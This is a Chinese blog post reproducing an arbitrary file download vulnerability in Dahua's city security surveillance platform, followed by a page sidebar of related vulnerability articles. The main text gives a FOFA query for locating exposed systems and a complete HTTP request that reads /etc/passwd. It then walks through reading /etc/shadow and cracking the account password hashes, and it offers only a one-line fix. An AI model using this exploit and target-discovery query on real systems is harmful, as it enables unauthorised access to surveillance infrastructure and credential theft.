漏洞复现--大华城市安防系统平台任意文件下载

最新推荐文章于 2024-03-20 08:45:16 发布
最新推荐文章于 2024-03-20 08:45:16 发布
阅读量164 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 网络安全 python

目录

免责声明:

一:漏洞描述

二:漏洞影响版本

三:网络空间测绘查询

四:漏洞复现

五:漏洞利用

六:修复方案

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!

一:漏洞描述

大华城市安防监控系统平台管理存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。

二:漏洞影响版本

-大华城市安防系统

三:网络空间测绘查询

fofa语句:

app="dahua-DSS"

image.png

四:漏洞复现

POC:

GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

image.png


 

image.png


成功读取etc/passwd

五:漏洞利用

用户密码存放在etc/shadow下,读取etc/shadow
 

image.png


拿去cmd解密
guest
 

image.png


ftp
 

image.png


运气好的话root密码可以破解。
点到为止,拿到密码后可以干什么懂得都懂,这里也是不演示了

六:修复方案

自行查询厂商发布补丁

渗透测试老鸟-九青
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
大华智慧园区综合管理平台存在任意文件上传漏洞
nnn2188185的博客
07-18 840
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上。
大华DH-HCVR4108HS-V3升级程序
01-13
大华DH-HCVR4108HS-V3升级程序,新版本支持乐橙。
大华校园安防系统建设方案
08-20
大华校园安防系统建设方案
大华 DSS 数字监控系统attachment_clearTempFile.action存在SQL注入漏洞
最新发布
weixin_43167326的博客
03-20 825
大华DSS(Digital Surveillance System)是一款功能强大的数字监控系统,广泛应用于各类安全监控场景。它采用先进的数字视频处理技术,能够实现高清、实时的视频监控,为安全管理提供了有力支持。大华DSS系统具有高度的灵活性和可扩展性,可根据实际需求配置不同的监控设备,满足不同场合的安全监控需求。同时,系统还支持远程监控和管理,用户可通过手机、电脑等终端设备随时查看监控画面,实时掌握现场情况。
DH-DSS-H8900智慧园区综合管理平台
03-01
DH-DSS-H8900 系列是为通用性公共建筑物提供安全和高效管理而打造的智慧园区综合管理平台,通过融合大华安防和智能化领域的专业经验和前沿技术,集成视频,门禁、报警,停车场,考 勤,访客,可视对讲,信息发布等多个业务 支持可视对讲,门禁一卡通、停车场管理  通过对讲设备管理,实现户户通话,室内报警联动,信息发布等功能  通过门禁管理,实现门禁的开关门,并实现门禁和视频的联动  通过卡口、道闸、LED 设备管理,实现出入口的综合性智能化管理  实现多设备、多路通道、多窗口的实时监控和预览  支持双目监控  支持鱼球联动  支持 36 路录像查询和回放  支持监控计划任务定制,多路多窗口视频轮巡、同时回放  支持本地抓图及本地录像  支持语音对讲  通过接入报警主机,实现报警管理  支持报警联动配置,弹出联动视频、查看多设备报警提示、录像信息功能 支持智能设备应用 支持智能跟踪、人数统计、主从跟随、特征识别、守望者、人脸识别等智能设备应用  通过配置电子地图,随时定位设备,从而轻松地部署管理  视频上墙,配置简单  通过配置巡更点、巡更路线,实现巡更管理
PPT版-大华视频应用平台——平安城市平台
07-11
PPT版-大华视频应用平台——平安城市平台
大华平台DSS视频监控系统介绍.doc
05-13
大华平台DSS视频监控系统介绍
大华城市安防监控系统平台管理存在任意文件下载漏洞
剁椒鱼头没剁椒的博客
02-14 2807
大华城市安防监控系统平台管理存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。刷新登录页面进行抓包,然后在数据包中添加POC。大华城市安防监控系统平台管理。
大华 DSS 数字监控系统 itcBulletin SQL 注入漏洞复现
holyxp的博客
12-18 1823
大华 DSs 数字监控系统大华开发的一款安防视频监控系统,拥有实时监视、云台操作、录像回放、报警处理、设备管理等功能。大华 DSS存在SQL注入漏洞,攻击者 pota/services/itcBuletin 路由发送特殊构造的数据包,利用报错注入获取数据库敏感信息。攻击者除了可以利用 SQL注入漏词获取数据库中的信息例如,管理员后台密码、站点的用户人人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限poc验证是否存在漏洞如果你想查询用户名和密码。
大华城市安防系统平台任意文件下载漏洞
CommputerMac的博客
10-06 600
大华城市安防监控系统平台是一款集视频、报警、存储、管理于一体的综合安防解决方案。该平台支持多种接入方式,包括网络视频、模拟视频、数字视频、IP电话、对讲机等。此外,该平台还支持多种报警方式,包括移动侦测、区域入侵、越线报警、人员聚集等。filePath=file:///etc/passwd,可下载文件。大华城市安防监控系统平台管理存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。关注微信公众号 网络安全透视镜 回复 20231007 获取检测利用脚本。
复现大华 DSS 数字监控系统 任意文件读取漏洞_38
fushuang333的博客
02-03 1207
复现大华 DSS 数字监控系统 任意文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容。
大华科技摄像头产品非授权访问漏洞技术分析与防护方案
02-10
大华科技摄像头产品非授权访问漏洞技术分析与防护方案
渗透测试-任意文件下载漏洞
weixin_43148062的博客
04-13 5180
任意文件下载概述 任意文件下载利用 任意文件下载挖掘 任意文件下载防御 一、任意文件下载概述 文件下载功能 许多网站都具备文件下载功能,某些文件下载功能实现过程是,根据参数filename的值,获得该文件在网站上的绝对路径,读取文件内容,发送给客户端进行下载。 什么是任意文件下载漏洞 文件下载漏洞是指文件下载功能没有对下载的文件类型、目录做合理严谨的过滤,导致用户可以下载服务器的任意文件...
任意文件下载漏洞
qq_52583912的博客
01-03 1106
任意文件下载漏洞
任意文件下载漏洞概述、复现、利用、危害、修复方案
白帽子凯哥聊黑客
12-20 1065
任意文件下载是一种允许攻击者从目标服务器下载任意文件的攻击类型。这可能导致严重的安全漏洞,例如泄露敏感信息、获取对服务器的未经授权的访问,甚至完全控制服务器。
任意文件读取/下载漏洞总结
热门推荐
未完成的歌~的博客
04-01 1万+
任意文件读取/下载漏洞(Arbitrary File Read/Download Vulnerability),是指攻击者可以通过某些漏洞,绕过应用程序的限制,直接读取或下载应用程序之外的文件。这种漏洞通常是由于应用程序没有对用户输入进行充分的验证和过滤而导致的。攻击者可以通过构造恶意的请求来利用该漏洞,从而读取或下载他们本来无权访问的文件,如密码、私钥、证书等,会提供攻击者更多可用信息,提高被入侵的风险。
任意文件下载漏洞利用分析和防御方法
白帽黑客鹏哥的博客
12-20 1396
任意文件下载漏洞是指攻击者可以通过特制的URL请求,绕过服务器的安全检查,下载服务器上任意文件。这通常是由于服务器端对用户请求的文件路径没有进行足够的过滤或验证,导致攻击者可以通过构造特殊的URL请求来访问服务器上任意文件。为了修复任意文件下载漏洞,服务器端需要对用户请求的文件路径进行严格的过滤和验证,防止攻击者通过构造特殊的URL请求来访问服务器上任意文件。一旦发现任意文件下载漏洞,就可以利用它来下载服务器上的任意文件。例如,可以通过以下步骤利用任意文件下载漏洞来下载服务器上的。
大华智慧园区综合管理平台密码泄露漏洞
xiaokp7的博客
09-07 995
大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。由于敏感目录并未进行鉴权,所以可以直接得到system的密码(采用MD5加密)。
任意文件下载漏洞原理以及修复方法
it知识分享 free for nothing..
12-25 1240
任意文件下载漏洞原理以及修复方法
怎么样使用opencv-python连接大华网络工业相机
06-08
连接大华网络工业相机需要使用到大华SDK和OpenCV库。以下是连接大华网络工业相机的一般步骤: 1. 下载并安装大华网络工业相机SDK,可以从大华官方网站上下载并安装。 2. 安装OpenCV库,可以使用pip命令进行安装:`pip install opencv-python`。 3. 在Python代码中引入大华SDK和OpenCV库,并初始化大华相机SDK。 ``` import cv2 from hcicap import * # 初始化大华相机SDK HCIDevice.Init() ``` 4. 连接大华网络工业相机,可以使用`HCIDevice.Open()`函数进行连接。 ``` # 连接相机 device = HCIDevice.Open("192.168.1.100") ``` 其中,192.168.1.100是相机的IP地址,需要根据实际情况进行设置。 5. 通过OpenCV库获取相机图像,可以使用`HCIDevice.GrabFrame()`函数获取图像数据,然后使用OpenCV库进行图像处理。 ``` # 获取相机图像 frame = HCIDevice.GrabFrame() # 将图像数据转换为OpenCV格式 img = cv2.imdecode(np.frombuffer(frame["data"], dtype=np.uint8), cv2.IMREAD_COLOR) ``` 6. 在完成图像处理后,需要释放大华相机SDK的资源。 ``` # 释放大华相机SDK资源 HCIDevice.Uninit() ``` 这些是连接大华网络工业相机的一般步骤,具体实现可以根据自己的需求进行调整和完善。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值